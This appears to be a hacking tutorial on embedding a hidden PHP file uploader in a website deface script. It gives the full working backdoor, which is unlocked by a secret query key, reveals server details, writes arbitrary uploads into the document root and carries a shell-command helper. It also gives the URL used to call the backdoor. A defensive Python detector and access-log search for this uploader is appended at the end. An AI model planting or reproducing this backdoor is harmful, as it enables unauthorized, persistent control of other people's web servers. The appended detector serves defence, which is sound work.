How to Embed a Hidden Uploader in a Deface Script





A hidden uploader can be used to upload files to a website on which that hidden uploader has been planted.

If we use an uploader or shell backdoor that is public, or that anyone can access, it will of course get taken over by someone else, right? :v So try this first: adding a hidden uploader to our favorite deface script to avoid that.


Put the following source code above your favorite deface script:

<?php
################################
## ./Alphra87 Hidden Uploader ##
################################
if(isset($_GET['sayang'])){
?>
<html>
<head>
<title>FAM_GTG</title>
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html {
background-color: black;
color: #f7f7f7;
font-size: 13px;
}
body {
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
}
a{
color:green;
text-decoration: none;
}
textarea{
backgroud-color:#333333;
color: #f7f7f7;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Ubuntu';
font-size: 13px;
}
select{
border: 1px white solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input[type=submit] {
background: #5b86e5;
color: #f7f7f7;
height: 24px;
border: 2px solid #f7f7f7;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
</style>
</head>
<center>
<?php
function w($dir,$perm) {
if(!is_writable($dir)) {
return "<font color=red>".$perm."</font>";
} else {
return "<font color=green>".$perm."</font>";
}
}
function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function sulap($text) {
if(!get_magic_quotes_gpc()) {
return $text;
}
return stripslashes($text);
}
function ambilKata($param, $kata1, $kata2){
if(strpos($param, $kata1) === FALSE) return FALSE;
if(strpos($param, $kata2) === FALSE) return FALSE;
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}
error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));
$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
echo "<b><font color='green'><br>Server IP : ".gethostbyname($_SERVER['HTTP_HOST'])."</b></font>";
echo "<b><font color='green'><br>".php_uname()."</b></font><br>";
echo "<b><font color='green'>Disable Functions: $show_ds</b></font><br><br>";
echo "&nbsp;<a href='?' style='background:#5b86e5;color:#f7f7f7;border:2px solid #f7f7f7;width:80px;padding:0px 8px 0px 8px;border-radius:5px;'>H O M E</a>&nbsp;";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='file'>
<input type='submit' value='upload' name='upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "Berhasil Upload --> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "gagal upload di document root.";
}
} else {
if(@copy($_FILES['file']['tmp_name'], $files)) {
echo "sukses upload <b>$files</b> di folder ini";
} else {
echo "gagal upload";
}
}
}
}
?>
Put your deface script here


Then save the file with the .PHP extension.
To call the uploader, request: /namafile.php?sayang
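
For defenders, an added example (not part of the original post): a Python check that flags PHP files with the structure shown above, that is, an upload form gated behind a `$_GET` key that copies the temporary upload to a client-chosen name under the document root, and then searches access-log lines for requests that use the recovered key. The regular expressions, the condensed PHP sample and the log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Patterns derived from the structure of the uploader shown on this page.
GATE = re.compile(r"isset\s*\(\s*\$_GET\s*\[\s*['\"](\w+)['\"]\s*\]\s*\)")
SINK = re.compile(r"(?:copy|move_uploaded_file)\s*\(\s*\$_FILES\s*\[[^\]]+\]"
                  r"\s*\[\s*['\"]tmp_name['\"]\s*\]")
CLIENT_NAME = re.compile(r"\$_FILES\s*\[[^\]]+\]\s*\[\s*['\"]name['\"]\s*\]")
DOCROOT = re.compile(r"\$_SERVER\s*\[\s*['\"]DOCUMENT_ROOT['\"]\s*\]")
REQUEST = re.compile(r'"(?:GET|POST) \S+?\?(\S*) HTTP')

# Constructed sample: a condensed form of the uploader's gate and copy logic.
SAMPLE_PHP = r"""<?php
if(isset($_GET['sayang'])){
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['file']['name'];
if(@copy($_FILES['file']['tmp_name'], $root.'/'.$files)) { echo "ok"; }
}
?>"""

# Constructed access-log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?sayang HTTP/1.1" 200 2314',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "POST /index.php?sayang HTTP/1.1" 200 2398',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?q=sayang HTTP/1.1" 200 512',
]

def scan_php(source):
    """Return (findings, gate_keys) for the text of one PHP file."""
    findings, gates = [], GATE.findall(source)
    if SINK.search(source):
        findings.append("upload-sink")            # raw copy of the temp upload
        if CLIENT_NAME.search(source):
            findings.append("client-filename")    # name chosen by the uploader
        if DOCROOT.search(source):
            findings.append("writes-docroot")     # lands in a web-served path
        if gates:
            findings.append("get-gated")          # form hidden behind a query key
    return findings, gates

def hunt_access_log(lines, gate_keys):
    """Return log lines whose query string uses one of the gate keys as a key."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and set(parse_qs(m.group(1), keep_blank_values=True)) & set(gate_keys):
            hits.append(line)
    return hits
```

A file that returns all four findings should be treated as a planted uploader, and every source address in the log hits should be reviewed for the files it wrote to the document root.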


